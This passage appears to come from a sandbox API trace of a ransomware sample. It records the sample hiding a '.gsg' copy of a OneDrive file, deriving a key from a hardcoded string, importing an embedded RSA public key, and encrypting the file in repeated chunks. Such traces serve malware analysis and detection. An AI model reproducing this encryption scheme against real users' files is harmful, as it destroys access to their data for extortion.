hTemplateFile=0x0) returned 0x5d48 [0273.145] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\bg\\FileSync.LocalizedResources.dll.mui.gsg", dwFileAttributes=0x2) returned 1 [0273.145] CryptAcquireContextA (in: phProv=0x2b9ce60, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9ce60*=0x2f295b8) returned 1 [0273.147] CryptCreateHash (in: hProv=0x2f295b8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9ce64 | out: phHash=0x2b9ce64) returned 1 [0273.147] lstrlenA (lpString="VjnQjmgTDrnneBnnDhUveiykzMlQm") returned 29 [0273.147] CryptHashData (hHash=0x2fa4c8, pbData=0x28cb6c0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0273.147] CryptDeriveKey (in: hProv=0x2f295b8, Algid=0x6610, hBaseData=0x2fa4c8, dwFlags=0x1000000, phKey=0x2b9ce50 | out: phKey=0x2b9ce50*=0x2facc8) returned 1 [0273.147] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0273.147] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9ce6c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48 | out: pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48) returned 1 [0273.147] CryptAcquireContextA (in: phProv=0x2b9ce5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9ce5c*=0x2f298e8) returned 1 [0273.148] CryptImportPublicKeyInfo (in: hCryptProv=0x2f298e8, dwCertEncodingType=0x1, pInfo=0x2f34650*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f34680*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f34688*, PublicKey.cUnusedBits=0x0), phKey=0x2b9ce54 | out: phKey=0x2b9ce54*=0x2fad48) returned 1 [0273.148] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9ce44*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9ce44*=0x80) returned 1 [0273.148] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f29640*, pdwDataLen=0x2b9ce58*=0x18, dwBufLen=0x80 | out: pbData=0x2f29640*, pdwDataLen=0x2b9ce58*=0x80) returned 1 [0273.148] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f29640*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f29640*, lpNumberOfBytesWritten=0x2b9ce68*=0x80, lpOverlapped=0x0) returned 1 [0273.149] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.163] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.163] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.165] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.166] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.166] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.166] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.166] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.166] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.167] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.167] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.167] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.167] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.167] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.167] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.167] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.167] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.167] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.168] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.168] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.168] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.168] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.168] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.168] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.168] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.168] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.168] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.168] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.168] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.168] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.168] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.169] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.169] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.169] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.169] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.169] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.169] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.169] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.169] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.169] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.169] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.169] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.169] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.169] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.169] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.170] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.170] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.170] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.170] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.170] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.170] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.170] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.170] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.170] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.170] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.170] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.170] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.170] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.171] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.171] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.171] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.171] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.171] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.171] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.171] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.171] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.171] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.171] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.171] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.171] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.171] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.172] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.172] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.172] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.172] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.172] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.172] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.172] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.172] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.172] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.172] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.172] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.172] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.172] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.172] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.172] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.172] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.173] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.173] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.173] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | 